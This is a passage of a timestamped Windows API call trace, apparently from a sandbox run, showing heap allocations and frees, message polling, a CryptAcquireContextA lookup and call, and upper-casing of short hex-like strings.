hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0196.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0196.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.085] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0196.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0196.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0196.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.085] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0196.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0196.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.086] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6480) returned 1 [0196.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0196.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0196.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0196.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.088] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0196.089] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0196.089] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0196.089] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0196.089] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0196.089] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.089] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0196.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0196.090] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.090] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.090] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.090] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0196.090] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0196.090] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0196.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.090] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0196.090] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.090] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.091] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.091] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0196.091] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0196.091] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.092] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0196.092] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.092] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.092] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.092] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.092] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.092] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.092] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.093] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0196.093] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0196.093] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0196.093] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.093] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.093] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.093] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.094] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.094] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.094] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0196.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.094] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.094] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.094] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0196.094] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0196.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.094] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0196.094] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.095] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.095] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.095] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.095] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0196.095] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 